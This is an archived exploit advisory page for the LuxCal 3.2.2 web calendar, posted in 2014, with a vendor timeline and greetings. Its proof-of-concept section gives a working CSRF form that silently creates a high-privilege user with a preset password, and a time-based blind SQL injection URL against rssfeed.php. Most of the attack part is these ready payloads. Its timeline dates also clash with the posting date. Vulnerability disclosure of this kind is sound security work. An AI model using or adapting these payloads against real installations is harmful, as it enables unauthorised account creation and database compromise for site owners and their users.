what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection

LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection
Posted Mar 10, 2014
Authored by TUNISIAN CYBER

LuxCal version 3.2.2 suffers from cross site request forgery and remote blind SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
SHA-256 | cb1d2b3682114f3b26171869233c5bde5b3187d3b611ab0235bc2c24bb7a38ab

LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection

Change Mirror Download
[+] Author: TUNISIAN CYBER
[+] Exploit Title: LuxCal v3.2.2 CSRF/Blind SQL Injection Vulnerabilities
[+] Date: 09-03-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352/CWE-89
[+] Vendor: http://www.luxsoft.eu/
[+] Friendly Sites: na3il.com,th3-creative.com
[+] Twitter: @TCYB3R

1.OVERVIEW:
LuxCal v3.2.2 suffers from a CSRF and Blind SQL Injection Vulnerabilities.

2.Version:
3.2.2

3.Background:
LuxCal is an innovative web based event calendar for home use and small businesses.
It is easy to setup and allows easy and fast management of your calendar events at home,
in the office, on business trips or when on holiday. LuxCal is feature rich, has been
designed for user-friendliness and will help you to make error-free data inputs.
The user interface colors are easy to customize. LuxCal is free "open source" software
released under the GNU General Public License
http://www.luxsoft.eu/index.php?pge=dtail

4.Proof Of Concept:
CSRF:
<html>
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">
<input type="hidden" name="uname" value="tcyber"/>
<input type="hidden" name="email" value="g4k@hot.mail"/>
<input type="hidden" name="new_pw" value="123456"/>
<input type="hidden" name="userRights" value="9"/>
<input type='submit' name='addExe' value="Add Profile">
</form>
</html>

Blind SQL Ijnection:
http://127.0.0.1/lux/rssfeed.php?cal=(select(0)from(select(sleep(0)))v)/*%27%2b(select(0)from(select(sleep(0)))v)%2b%27%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
"SQL error. See 'logs/mysql.log'"

5.Solution(s):
no contact from vendor

6.TIME-LINE:
2014-07-03: Vulnerability was discovered.
2014-07-03: Contact with vendor.
2014-08-03: No reply.
2014-09-03: No reply.
2014-09-03: Vulnerability Published



7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close